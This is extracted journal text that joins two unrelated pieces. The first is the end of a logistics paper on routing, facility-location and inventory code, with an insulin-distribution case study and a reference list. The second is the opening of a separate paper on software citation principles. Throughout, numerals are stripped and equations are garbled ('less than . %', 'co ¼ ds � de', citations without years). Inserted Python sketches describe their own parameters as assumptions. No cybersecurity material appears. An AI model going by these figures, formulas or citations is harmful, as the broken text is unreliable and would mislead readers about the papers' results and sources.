after multiple executions of the meta-heuristic (as performed in chaves & nogueira-lorena ( , )), the coefficient of variability (cv) and the best, worst, and average results are obtained to estimate their associated error gaps from the best-known (bk) solutions of the test instances. as observed, the cv is very small (less than . % for all instances), hence the algorithm is stable. thus, a very suitable solution can be obtained within a few executions of the algorithm, which for all instances (except doni ) is within the error gap of . %. other assessment schemes can consider the execution time, the time to the best solution, and average computational times; this is specific to the assessment of new solving methods. logistic research is continuously extended in two important fields: (a) mathematical modeling of problems, and (b) adaptation and development of new solving methods. as presented, this work can provide the basis and resources for both research fields.
[figure: coded suite: solution of the nns meta-heuristic for the cccp instance sjc .dat as computed by the function nnscccp. (a) assignment of customers to centroids. (b) convergence of the best found solution.]
[figure: characteristics of the capacitated facility location problem (cflp). (a) capacitated weber problem. (b) capacitated centered clustering problem (cccp). (c) capacitated p-median problem (cpmp).]
[figure: extended data for assessment of the nns algorithm for cccp: for each sjc and doni instance (n, p, best-known value bk), the best, worst and average results, their error gaps (%) and the cv over multiple executions of the nns algorithm.]
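a small python sketch of the multi-execution assessment described at the beginning of this passage (best/worst/average error gaps against a best-known value, plus the coefficient of variability of the results); the function name and the number of runs in the usage comment are assumptions of this example.

```python
import statistics

def assess_runs(results, best_known):
    """Summarize multiple executions of a meta-heuristic against the best-known
    value: best/worst/average error gaps (%) and coefficient of variability."""
    gap = lambda a: 100.0 * (a - best_known) / best_known
    mean = statistics.mean(results)
    cv = statistics.stdev(results) / mean if len(results) > 1 else 0.0
    return {
        "best_gap_%": gap(min(results)),
        "worst_gap_%": gap(max(results)),
        "avg_gap_%": gap(mean),
        "cv": cv,
    }

# usage sketch: run the heuristic several times with different seeds
# runs = [nns_cccp(points, demand, p, capacity, seed=s)[2] for s in range(20)]
# print(assess_runs(runs, best_known=best_known_value))  # best-known value from the literature
```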
a note on solving methods for the mflp
as with the cvrp, the mflp is also of np-hard complexity and is very relevant to distribution performance. main research is performed in the following contexts:
- problem modeling: within this context the following extensions can be mentioned: the k-balanced center location problem (davoodi, ), the multi-facility weber problem with polyhedral barriers (akyüz, ), the multi-commodity multi-facility weber problem (akyüz, Öncan & altinel, ), the multi-facility location-allocation problem with stochastic demands (alizadeh et al., ), the p-center flp with disruption (du, zhou & leus, ), and mflp models for waste management (adeleke & olukanni, ).
- problem solving: due to the complexity of the mflp itself, most of the solving methods are based on meta-heuristics such as parallel genetic algorithms (p-ga) (herda, ), the adaptive biased random-key genetic algorithm (abrkga) (chaves, gonçalves & nogueira-lorena, ), and spatial optimization (yao & murray, ). most recently, the use of game theory concepts has been proposed, such as nash equilibria for the mflp with competition (pelegrin, fernandez & garcia, ).
to extend on these works, it is recommended to have basic proficiency regarding the general structure of a meta-heuristic method and its implementation through computer programming. the suite code nnscccp can provide both resources.

application case
in this section an integrative case is presented to illustrate the application of the coded suite. this case is focused on the distribution of insulin, which is a vital product for people with chronic diseases such as pancreatic insufficiency or diabetes. the main function of insulin is to regulate the concentrations of glucose and lipids in the blood stream; if there is a deficiency of insulin, the body cannot process these elements efficiently, leading to liver and kidney failure, damage to nerve cells, cognitive impairment, blindness and amputations (olivares-reyes & arellano plancarte, ; berlanga-acosta et al., ). currently, the demand for insulin is increasing due to the high prevalence of diabetes (type 1 and type 2) within the general population (mora-morales, ; tsilas et al., ). frequently, people need different insulin prescriptions, and sometimes more than one person within a region needs insulin. this leads to variable demand patterns through the general population, and distribution must be planned accordingly to supply all demands. to address the associated logistic problem, the following steps are considered:
a) design a test instance with the two main features of the considered scenario: a large set of demand locations within a geographic region, and demand patterns per location considering the characteristics of the distribution fleet and product. operational costs associated with inventory management must also be defined for the considered product.
b) adapt the most appropriate routing model to formulate the distribution problem with inventory control to supply the considered product within a planning horizon.
c) adapt the most appropriate inventory control model to establish the distribution frequency through the planning horizon with minimization of costs.
d) select an appropriate solution method for the problem and analyze the results.
e) discuss potential opportunities to improve the solution.
the details of these steps are presented in the following sections.

(a) design the test instance
by using the function generatedata, a set of normally distributed location points was generated.
then, by using the function rescaling, these points were located within a specific geographic region. this methodology to generate the test instance is similar to the one proposed for the oil platform transport problem (optp), which is a variant of the cvrp (diaz-parra et al., ). from field data, the fleet of a regional distribution center for medicines typically consists of a limited number of standardized vehicles with temperature control. for this case, a homogeneous fleet of seven vehicles was considered for the set of location points, and the distribution center was located at λ = − . and ϕ = . . the capacity of each vehicle was defined considering the characteristics of the product, which consists of a pre-filled injection pen of ml with ui/ml ( insulin units per pen), an approximate cost of c = usd, and a volume of . m3. by considering . m3 as the capacity of the vehicle's container for insulin, its capacity in terms of the product was estimated accordingly (container volume divided by product volume). finally, a planning horizon and reliable source data were considered to determine the demand patterns for the set of locations. the daily insulin dosage reported in islam-tareq ( ) was considered as input data for a monte carlo simulation model to provide statistical data (mean μ and standard deviation σ, in insulin units) regarding the cumulative demand for the multi-week planning horizon. then, this statistical data was expressed in terms of units of product, as each pen contains a fixed number of insulin units. for reference purposes, an example of the geographic and demand data for the test instance of location points is presented in the corresponding tables. the complete data is available within location_data.xlsx and extended_demand_data.xlsx.

(b) adapting the appropriate routing model
due to the characteristics of the input data, the cvrp was identified as the reference routing model. there are variations of this model which could be applied to the application case, such as the periodic vrp (pvrp) and the time-windows vrp (twvrp) (francis, smilowitz & tzur, ). however, the standard cvrp was suitable for the application case, as the distribution planning must be performed according to the frequency of inventory replenishment. by defining the cvrp as the routing model, the function distmetrics was used to compute the distance matrix in kilometers (arc length), which is the input data for the cvrp. because minimization of the inventory management costs is the main objective of the distribution scheme, the total inventory cost of the inventory control model (see the corresponding figures) was considered as the objective function. in particular, the order cost co is associated with the logistic operations of transportation and, thus, it is directly associated with route planning and data from the distance matrix. in the following section, the integration of the traveled distance (source data within the distance matrix) with co is described considering the appropriate inventory control model.
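as a hedged illustration of the monte carlo demand-generation step described in (a) above, the following python sketch samples daily insulin doses per location over the planning horizon and converts the cumulative demand into pre-filled pens; the dosage values, the number of patients per location, the 8-week horizon, and the 300 insulin units per pen are assumptions of this example, not the paper's data.

```python
import numpy as np

def simulate_location_demand(daily_doses, weeks=8, units_per_pen=300,
                             n_patients=5, n_sims=2000, rng=None):
    """Monte Carlo sketch: sample daily insulin doses (in insulin units) for the
    patients of one location over the planning horizon and convert the cumulative
    demand into pre-filled pens. Returns the mean and std of pens demanded."""
    rng = np.random.default_rng(rng)
    days = 7 * weeks
    totals = np.empty(n_sims)
    for s in range(n_sims):
        # each simulated day, every patient consumes one dose drawn from the data
        doses = rng.choice(daily_doses, size=(n_patients, days))
        totals[s] = doses.sum() / units_per_pen     # cumulative demand in pens
    return totals.mean(), totals.std(ddof=1)

# usage sketch with made-up dosage data (insulin units per patient per day)
# mu, sigma = simulate_location_demand([28, 35, 42, 50, 64], weeks=8)
```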
because the product’s distribution must be performed periodically (each weeks) it is recommended to synchronize it with the inventory supply frequency. for this purpose, the p model (periodic review) was considered as the most appropriate model because inventory replenishment through the (q, r) model depends of the re-order point which may be reached at different times. table example of location data (latitude, longitude) for the application case (generated by functions generatedata and rescaling). i λ ϕ … i λ ϕ − . . … − . . − . . … − . . − . . … − . . ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ − . . … − . . note: complete data is available within location_data.xlsx. table statistical data of units of end-product (pre-filled pens) requested by the application case: coefficient of variability cv = σ/μ (generated by monte carlo simulation). i μ σ cv … i μ σ cv . … . . … . . … . ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ . … . note: complete data is available within extended_demand_data.xlsx. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the following parameters were considered to adapt the p model to estimate the net requirements for the present case: t = one period of -weeks ( days), and lt = one day ( / = . of one period of -weeks). note that under this assumption, d = μ (see table ) and z = . for a service level of . %. regarding costs, co and ch were estimated from the point of view of the ordering entity (i.e., drugstores, small clinics, and patients at home). because ordering costs must cover the operating costs of the supplier which are dependent of the lot size and the service distance, co was estimated as: co ¼ ds � de � dj þ dp ( ) where ds is the diesel cost per liter, de is the efficiency of the vehicle (kilometers per liter), and dj is the cumulative distance up to the delivery point j (source data within the distance matrix). for a standard vehicle de was estimated as kilometers per liter and ds as . usd per liter (based on regional costs). because dj is directly associated to the traveled distance, its minimization was achieved through the application of the cvrp model (see function nnscvrp). then, ch was estimated as . % of c. table presents an example of the net requirements (lot size q) per location based on the p model considering a period between reviews of weeks (see function periodicreview). these results represent the final demand data for the cvrp model. the complete data is available within q_demand_data.xlsx. (d) solution method and analysis of results figure presents an overview of the coded suite’s functions used to provide a solution for the application case. by having the test instance data, the first set of results was obtained by solving the cvrp through the function nnscvrp. these results consisted of seven capacity-restricted sub-routes (one for each vehicle) estimated to serve all locations. these results are presented in fig. . then, the second set of results was obtained by computing the inventory management costs at each location (see eq. ) based on the visiting sequence defined by each sub-route table demand as lot quantities (q) based on the periodic review (p) for application case (computed by function periodicreview). i q i q … i q … … … ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ … note: complete data is available within q_demand_data.xlsx. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . 
the corresponding table presents an example of the order cost (co) and total inventory cost (tc) computed at each location. the complete data is available within results_inventory_costs.xlsx.
[figure: methodology and functions used to provide a solution for the application case: identification of the logistic problem (homogeneous capacitated distribution/routing problem, variable demand patterns); data collection and design of the test instance (geographic location data with generatedata and rescaling, demand data with monte carlo simulation and periodicreview, distance metric with distmetrics); and solution method and analysis of results (distribution planning through the cvrp model with nnscvrp, cost analysis with periodicreview).]
[figure: results of the distribution model as computed by the function nnscvrp. (a) sub-routes (visiting sequences per route, with the distribution center at the depot node). (b) visualization of the sub-routes (longitude vs. latitude).]
from the corresponding table (file results_inventory_costs.xlsx), the sum of all total costs associated with inventory management was computed as , . usd, where the total order cost was computed as . usd. this represents a significant investment even if appropriate inventory control and distribution planning is performed. nevertheless, these results constitute the reference data for improvements, which can be obtained by extending the availability of other distribution centers. this is addressed in the following section.

(e) opportunities for improvement
from the previous results, the task of finding an alternative location for the distribution center (or distribution centers) was explored. first, a new location for the current distribution center was estimated by using the function nnscccp (at λ = − . and ϕ = . ). then, the cvrp was solved through the function nnscvrp and the inventory management costs associated with each sub-route were computed. for this new location scenario, the corresponding table presents an example of the order cost (co) and total inventory cost (tc) computed at each location. the complete data is available within results_inventory_costs_relocated_center.xlsx. from these data, the sum of all total costs was computed as . usd for tc and . usd for co.
[table: results of the inventory control model concerning co and total cost (tc) per location i, as computed by the function periodicreview; complete data is available within results_inventory_costs.xlsx.]
[table: results of the inventory control model concerning co and total cost (tc) per location i, as computed by the function periodicreview with a new distribution center located by the function nnscccp (sub-routes estimated by the function nnscvrp); complete data is available within results_inventory_costs_relocated_center.xlsx.]
this represents a reduction, computed as (1 − new cost / reference cost) × 100%, for both tc and co. given this improvement, the second step consisted of considering more distribution centers. the corresponding table presents the total inventory management cost for the cases with three, four, five, six and seven distribution centers. it can be observed that there is a limit to increasing the number of distribution centers in order to reduce the total inventory costs: a steady reduction is observed for up to five distribution centers, whereas a steady increase is observed for six and seven distribution centers (which implies a vehicle per distribution center). hence, it is important to consider that there is an optimal or near-optimal number of distribution centers to reduce the total costs associated with distance. also, the achieved savings must compensate for the investment required for this additional infrastructure within a suitable period of time.
[table: general results of the inventory control model concerning the total co and tc as computed by the function periodicreview with three to seven distribution centers located by the function nnscccp (sub-routes estimated by the function nnscvrp).]

results and conclusions
in this work the development of resources for logistics and inventory management research was presented. these resources were complemented with source code and implementation examples to motivate their learning and application. specifically, the following aspects were covered by this coded suite:
- development of vehicle routing/facility location instances with near-to-real geographical data;
- development of instances with symmetric and asymmetric distance/cost data considering the main distance metrics available for modeling;
- development of exporting and plotting codes for visualization and processing by third-party platforms;
- development of implementation code to evaluate the performance of inventory management techniques with uncertain demand;
- development of a nearest-neighbor search (nns) with greedy randomized adaptive search procedure (grasp) algorithm to (1) provide very suitable solutions to integrated facility location-inventory-vehicle routing problems, and (2) provide insights regarding how these solving methods work. this meta-heuristic could provide very suitable results for large cvrp and cccp instances (> customers/locations);
- solution and analysis of an integrative problem with the main functions of the coded suite.
it is important to mention that logistic research extends to many fields and problems, and these resources represent just a small fraction of them. also, the developed codes are subject to improvements and, thus, they can be extended in the following aspects:
- integrate the use of public gis data through the limited free service of bing maps and google maps, as performed by erdogan ( a, b);
- integrate other meta-heuristics such as tabu-search (ts) and ant-colony optimization (aco) for a parallel execution of solving methods;
- integrate logistic problems with non-linear objective functions.
as introductory work, the present coded suite can provide the academic or professional with the key aspects to understand most of the associated works and tools reported in the specialized literature.

additional information and declarations
funding
the authors received no funding for this work.
competing interests
the authors declare that they have no competing interests.
author contributions
- santiago-omar caballero-morales conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
data availability
the following information was supplied regarding data availability: the code is available in the supplemental files.
supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
adamu i. . reorder quantities for (q, r) inventory models. international mathematical forum ( ): – doi . /imf. . .
adeleke oj, olukanni do. . facility location problems: models, techniques, and applications in waste management. recycling ( ): – doi . /recycling .
akyüz mh. . the capacitated multi-facility weber problem with polyhedral barriers: efficient heuristic methods. computers & operations research : – .
braglia m, castellano d, marrazzini l, song d. . a continuous review (q, r) inventory model for a deteriorating item with random demand and positive lead time. computers and operations research : – doi . /j.cor. . . . bräysy o, gendreau m. a. vehicle routing problem with time windows, part i: route construction and local search algorithms. transportation science ( ): – doi . /trsc. . . bräysy o, gendreau m. b. vehicle routing problem with time windows, part ii: metaheuristics. transportation science ( ): – doi . /trsc. . . caballero-morales so, martinez-flores jl. . analysis and reduction of co emissions and costs associated to inventory replenishment strategies with uncertain demand. polish journal of environmental studies ( ): – doi . /pjoes/ . carotenuto p, giordani s, zaccaro a. . a simulation-based approach for evaluating the impact of maritime transport on the inventory levels of an oil supply chain. transportation research procedia : – doi . /j.trpro. . . . cazabal-valencia l, caballero-morales so, martinez-flores jl. . logistic model for the facility location problem on ellipsoids. international journal of engineering business management ( ): – doi . / . chaves aa, gonçalves jf, nogueira-lorena la. . adaptive biased random-key genetic algorithm with local search for the capacitated centered clustering problem. computers & industrial engineering : – doi . /j.cie. . . . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.burnso. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /trsc. . http://dx.doi.org/ . /trsc. . http://dx.doi.org/ . /pjoes/ http://dx.doi.org/ . /j.trpro. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.cie. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chaves aa, nogueira-lorena la. . clustering search algorithm for the capacitated centered clustering problem. computers & operations research ( ): – doi . /j.cor. . . . chaves aa, nogueira-lorena la. . hybrid evolutionary algorithm for the capacitated centered clustering problem. expert systems with applications ( ): – doi . /j.eswa. . . . darwish ma. . joint determination of order quantity and reorder point ofcontinuous review model under quantity and freight rate discounts. computers & industrial engineering : – . daugherty p, bolumole y, schwieterman m. . logistics research: what a long, strange trip it’s been. transportation journal ( ): – doi . /transportationj. . . . davoodi m. . k-balanced center location problem: a new multi-objective facility location problem. computers & operations research : – doi . /j.cor. . . . de sk, sana ss. . multi-criterion multi-attribute decision-making for an eoq model in a hesitant fuzzy environment. pacific science review a: natural science and engineering ( ): – doi . /j.psra. . . . diaz-parra o, ruiz-vanoye ja, fuentes-penna a, bernabe-loranca b, perez-ortega j, barrera-camara ra, velez-diaz d, perez-olguin nb. . oil platform transport problem (optp) is np-hard. international journal of combinatorial optimization problems and informatics ( ): – . du b, zhou h, leus r. . a two-stage robust model for a reliable p-center facility location problem. applied mathematical modelling ( ): – doi . /j.apm. . . . eaton jw, bateman d, hauberg s, wehbring r. . gnu octave version . . 
manual: a high-level interactive language for numerical computations. available at https://www.gnu.org/ software/octave/doc/v . . /. environmental systems research institute. . arcgis. available at https://www.esri.com/en- us/arcgis/about-arcgis/overview. erdogan g. a. flp spreadsheet solver. available at https://people.bath.ac.uk/ge /flp- spreadsheet-solver/. erdogan g. b. vrp spreadsheet solver. available at https://people.bath.ac.uk/ge /vrp- spreadsheet-solver/. erturgut r. . increasing demand for logistics technician in business world and rising trend of logistics programs in higher vocational schools: turkey case. procedia - social and behavioral sciences : – doi . /j.sbspro. . . . francis pm, smilowitz kr, tzur m. . the period vehicle routing problem and its extensions. in: golden b, raghavan, s, wasil e, eds. the vehicle routing problem: latest advances and new challenges. boston: springer, – . google llc. . google maps platform. available at https://developers.google.com/learn/topics/ maps-platform. hannan ma, akhtar m, begum ra, basri h, hussain a, scavino e. . capacitated vehicle-routing problem model for scheduled solid waste collection and route optimization using pso algorithm. waste management : – doi . /j.wasman. . . . hariga m. . a continuous review (q,r) model with owned and rented storage facilities. in: proceedings of the ieee international conference on computers & industrial engineering (cie ). – . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /transportationj. . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.psra. . . http://dx.doi.org/ . /j.apm. . . https://www.gnu.org/software/octave/doc/v . . / https://www.gnu.org/software/octave/doc/v . . / https://www.esri.com/en-us/arcgis/about-arcgis/overview https://www.esri.com/en-us/arcgis/about-arcgis/overview https://people.bath.ac.uk/ge /flp-spreadsheet-solver/ https://people.bath.ac.uk/ge /flp-spreadsheet-solver/ https://people.bath.ac.uk/ge /vrp-spreadsheet-solver/ https://people.bath.ac.uk/ge /vrp-spreadsheet-solver/ http://dx.doi.org/ . /j.sbspro. . . https://developers.google.com/learn/topics/maps-platform https://developers.google.com/learn/topics/maps-platform http://dx.doi.org/ . /j.wasman. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ herda m. . parallel genetic algorithm for capacitated p-median problem. procedia engineering : – doi . /j.proeng. . . . hovelaque v, bironneau l. . the carbon-constrained eoq model with carbon emission dependent demand. international journal of production economics : – doi . /j.ijpe. . . . islam-tareq t. . fuzzy logic: a contemporary technique in refining physicians’ prescribed total daily insulin dosage for type diabetes patients. bachelor thesis. department of pharmacy, brac university. kuczyńska-chalada m, furman j, poloczek r. . the challenges for logistics in the aspect of iindustry . . multidisciplinaty aspects of production engineering ( ): – . lee jy, behnezhad a. . incremental quantity discounts in a periodic-review stochastic inventory model with a general demand distribution. international journal of mathematics in operational research ( ): – doi . /ijmor. . . lee sh. . memetic algorithm for stochastic inventory optimization with seasonal demand. master thesis. erasmus school of economics, erasmus university rotterdam. lieberman g, hillier f. . introduction to operations research. seventh edition. new york: mcgraw-hill. 
liu xh, shan my, zhang rl, zhang lh. . green vehicle routing optimization based on carbon emission and multiobjective hybrid quantum immune algorithm. mathematical problems in engineering ( ): – doi . / / . lloyd c, pötsch t, yi s, zuñiga r, safaei m, issa s, rügge i. . resources in logistics - a multidisciplinary challenge. in: proceedints of the th international federation of automatic control conference on management and control of production and logistics (ifac ). – . mandziuk z, swiechowski m. . uct in capacitated vehicle routing problem with traffic jams. information sciences - : – doi . /j.ins. . . . mora-morales e. . estado actual de la diabetes mellitus en el mundo. acta medica costarricense ( ): – . mulloorakam at, nidhiry nm. . combined objective optimization for vehicle routing using genetic algorithm. materials today: proceedings ( ): – doi . /j.matpr. . . . muriana c. . an eoq model for perishable products with fixed shelf life under stochastic demand conditions. european journal of operational research ( ): – doi . /j.ejor. . . . mysen e. . goce quasigeoid performance for norway. international journal of applied earth observation and geoinformation : – doi . /j.jag. . . . negreiros m, palhano a. . the capacitated centred clustering problem. computers & operations research ( ): – doi . /j.cor. . . . nogueira-lorena la. . problem instances. available at http://www.lac.inpe.br/~lorena/ instancias.html. olivares-reyes ja, arellano plancarte a. . bases moleculares de las acciones de la insulina. red de revistas cientificas de america latina, el caribe, españa y portugal ( ): – . oliveira d, uchoa e, pecin d, pessoa a, poggi m, vidal t, subramanian a. . cvrplib capacitated vehicle routing problem library. available at http://vrp.atd-lab.inf.puc-rio.br/index. php/en/. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.proeng. . . http://dx.doi.org/ . /j.ijpe. . . http://dx.doi.org/ . /ijmor. . http://dx.doi.org/ . / / http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.matpr. . . http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /j.jag. . . http://dx.doi.org/ . /j.cor. . . http://www.lac.inpe.br/~lorena/instancias.html http://www.lac.inpe.br/~lorena/instancias.html http://vrp.atd-lab.inf.puc-rio.br/index.php/en/ http://vrp.atd-lab.inf.puc-rio.br/index.php/en/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pelegrin b, fernandez p, garcia md. . computation of multi-facility location nash equilibria on a network under quantity competition. networks and spatial economics ( ): – doi . /s - - - . prodhon c, prins c. . a survey of recent research on location-routing problems. european journal of operational research ( ): – doi . /j.ejor. . . . rao k, stenger a, wu hj. . integrating the use of computers in logistics education. international journal of physical distribution & logistics management ( ): – doi . / . reinelt g. . tsplib: a traveling salesman problem library. orsa journal on computing ( ): – doi . /ijoc. . . . reinelt g. . tsplib. available at http://elib.zib.de/pub/mp-testdata/tsp/tsplib/tsplib.html. richardson d. . dealing with geoprivacy and confidential geospatial data. arcnews spring: . rojas-cuevas id, caballero-morales so, martinez-flores jl, mendoza-vazquez jr. . capacitated vehicle routing problem model for carriers. journal of transport and supply chain management ( ): – doi . /jtscm.v i . . sachan a, datta s. . review of supply chain management and logistics research. 
international journal of physical distribution & logistics management ( ): – doi . / . sanchez-vega mr, caballero-morales so, sanchez-partida d, martinez-flores jl. . risk-based strategic inventory supply model for new products. in: garcía alcaraz j, rivera cadavid l, gonzález-ramírez r, leal jamil g, chong chong m, eds. best practices in manufacturing processes. cham: springer, – . sevgen a. . a continuous-review inventory model with disruptions and reorder point. master thesis. graduate school of natural and applied sciences, izmir university of economics. sitek p, wikarek j, rutczynska-wdowiak k, bocewicz g, banaszak z. . optimization of capacitated vehicle routing problem with alternative delivery, pick-up and time windows: a modified hybrid approach. neurocomputing – doi . /j.neucom. . . . stefanello f, cb-de-araújo o, müller f. . matheuristics for the capacitated p-median problem. international transactions in operational research ( ): – doi . /itor. . tao y, wang f. . an effective tabu search approach with improved loading algorithms for the l-cvrp. computers & operations research : – doi . /j.cor. . . . thinakaran n, jayaprakas j, elanchezhian c. . survey on inventory model of eoq & epq with partial backorder problems. materials today: proceedings : – doi . /j.matpr. . . . toffolo tam, vidal t, wauters t. . heuristics for vehicle routing problems: sequence or set optimization? computers & operations research : – doi . /j.cor. . . . tokgöz e, trafalis t. . -facility manifold location routing problem. optimization letters ( ): – doi . /s - - - . tsilas cs, de-souza rj, blanco-mejia s, mirrahimi a, cozma ai, jayalath vh, ha v, tawfik r, di-buono m, jenkins al, leiter la, wolever tms, beyene j, khan t, jenkins dja, kendall cwc, sievenpiper jl. . relation of total sugars, fructose and sucrose with incident type diabetes: a systematic review and meta-analysis of prospective cohort studies. canadian medical association journal ( ): – doi . /cmaj. . caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . / http://dx.doi.org/ . /ijoc. . . http://elib.zib.de/pub/mp-testdata/tsp/tsplib/tsplib.html http://dx.doi.org/ . /jtscm.v i . http://dx.doi.org/ . / http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /itor. http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /j.matpr. . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /cmaj. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ uchoa e, pecin d, pessoa a, poggi m, vidal t, subramanian a. . new benchmark instances for the capacitated vehicle routing problem. european journal of operational research ( ): – doi . /j.ejor. . . . wei l, zhang z, zhang d, leung sch. . a simulated annealing algorithm for the capacitated vehicle routing problem with two-dimensional loading constraints. european journal of operational research ( ): – doi . /j.ejor. . . . yao j, murray at. . a spatial optimization approach for solving a multi-facility location problem with continuously distributed demand. in: thill jc, ed. innovations in urban and regional systems. new york: springer, – . zäpfel g, braune r, bögl m. . metaheuristic search concepts: a tutorial with applications to production and logistics. heidelberg dordrecht london new york: springer. caballero-morales ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /peerj-cs. 
software citation principles
arfon m. smith*, daniel s. katz*, kyle e. niemeyer* and the force software citation working group

github, inc., san francisco, california, united states
national center for supercomputing applications & electrical and computer engineering department & school of information sciences, university of illinois at urbana-champaign, urbana, illinois, united states
school of mechanical, industrial, and manufacturing engineering, oregon state university, corvallis, oregon, united states
* these authors contributed equally to this work.

abstract
software is a critical part of modern research and yet there is little support across the scholarly ecosystem for its acknowledgement and citation. inspired by the activities of the force working group focused on data citation, this document summarizes the recommendations of the force software citation working group and its activities between june and april . based on a review of existing community practices, the goal of the working group was to produce a consolidated set of citation principles that may encourage broad adoption of a consistent policy for software citation across disciplines and venues. our work is presented here as a set of software citation principles, a discussion of the motivations for developing the principles, reviews of existing community practice, and a discussion of the requirements these principles would place upon different stakeholders. working examples and possible technical solutions for how these principles can be implemented will be discussed in a separate paper.

subjects digital libraries, software engineering
keywords software citation, software credit, attribution

software citation principles
the main contribution of this document is the set of software citation principles, written fairly concisely in this section and discussed further later in the document (see discussion). in addition, we also motivate the creation of these principles (see motivation), describe the process by which they were created (see process of creating principles), summarize use cases related to software citation (see use cases), and review related work (see related work). we also lay out the work needed for these software citation principles to be applied (see future work).

1. importance: software should be considered a legitimate and citable product of research. software citations should be accorded the same importance in the scholarly record as citations of other research products, such as publications and data; they should be included in the metadata of the citing work, for example in the reference list of a journal article, and should not be omitted or separated. software should be cited on the same basis as any other research product such as a paper or a book; that is, authors should cite the appropriate set of software products just as they cite the appropriate set of papers.
2. credit and attribution: software citations should facilitate giving scholarly credit and normative, legal attribution to all contributors to the software, recognizing that a single style or mechanism of attribution may not be applicable to all software.

3. unique identification: a software citation should include a method for identification that is machine actionable, globally unique, interoperable, and recognized by at least a community of the corresponding domain experts, and preferably by general public researchers.

4. persistence: unique identifiers and metadata describing the software and its disposition should persist, even beyond the lifespan of the software they describe.

5. accessibility: software citations should facilitate access to the software itself and to its associated metadata, documentation, data, and other materials necessary for both humans and machines to make informed use of the referenced software.

6. specificity: software citations should facilitate identification of, and access to, the specific version of software that was used. software identification should be as specific as necessary, such as using version numbers, revision numbers, or variants such as platforms.

motivation
as the process of research has become increasingly digital, research outputs and products have grown beyond simply papers and books to include software, data, and other electronic components such as presentation slides, posters, (interactive) graphs, maps, websites (e.g., blogs and forums), and multimedia (e.g., audio and video lectures). (we use the term "research" here to include work intended to increase human knowledge and benefit society, in science, engineering, humanities, and other areas.) research knowledge is embedded in these components. papers and books themselves are also becoming increasingly digital, allowing them to become executable and reproducible. as we move towards this future where research is performed in and recorded as a variety of linked digital products, the characteristics and properties that developed for books and papers need to be applied to, and possibly adjusted for, all digital products. here, we are concerned specifically with the citation of software products. the challenge is not just the textual citation of software in a paper, but the more general identification of software used within the research process. this work focuses on making software a citable entity in the scholarly ecosystem. while software products represent a small fraction of the sum total of research output, this work, together with other efforts such as the force data citation principles (data citation synthesis group, ; starr et al., ), collectively represents an effort to better describe (and cite) all outputs of research.

software and other digital resources currently appear in publications in very inconsistent ways. for example, a random sample of articles in the biology literature found seven different ways that software was mentioned, including simple names in the full text, urls in footnotes, and different kinds of mentions in reference lists: project names or websites, user manuals, or publications that describe or introduce the software (howison & bullard, ). table shows examples of these varied forms of software mentions and the frequency with which they were encountered. many of these kinds of mentions fail to perform the functions needed
of citations, and their very diversity and frequent informality undermine the integration of software work into bibliometrics and other analyses. studies on data and facility citation have shown similar results (huang, rose & hsu, ; mayernik, maull & hart, ; parsons, duerr & minster, ).

table : varieties of software mentions in publications, from howison & bullard ( ). the mention types observed were cite to publication, cite to user's manual, cite to name or website, instrument-like, url in text, in-text name only, and not even name, each reported with a count and a percentage of the sampled articles.

there are many reasons why this lack of both software citations in general and standard practices for software citation is of concern:
- understanding research fields: software is a product of research, and by not citing it we leave holes in the record of research progress in those fields.
- credit: academic researchers at all levels, including students, postdocs, faculty, and staff, should be credited for the software products they develop and contribute to, particularly when those products enable or further research done by others. non-academic researchers should also be credited for their software work, though the specific forms of credit differ from those for academic researchers. (providing recognition of software can have tremendous economic impact, as demonstrated by the role of the text retrieval conference (trec) in information retrieval (rowe et al., ).)
- discovering software: citations enable the specific software used in a research product to be found. additional researchers can then use the same software for different purposes, leading to credit for those responsible for the software.
- reproducibility: citation of the specific software used is necessary for reproducibility, although not sufficient; additional information such as configurations and platform issues is also needed.

process of creating principles
the force software citation working group was created in april with the following mission statement:

the software citation working group is a cross-team committee leveraging the perspectives from a variety of existing initiatives working on software citation to produce a consolidated set of citation principles in order to encourage broad adoption of a consistent policy for software citation across disciplines and venues. the working group will review existing efforts and make a set of recommendations. these recommendations will be put forward for endorsement by the organizations represented by this group and others that play an important role in the community.
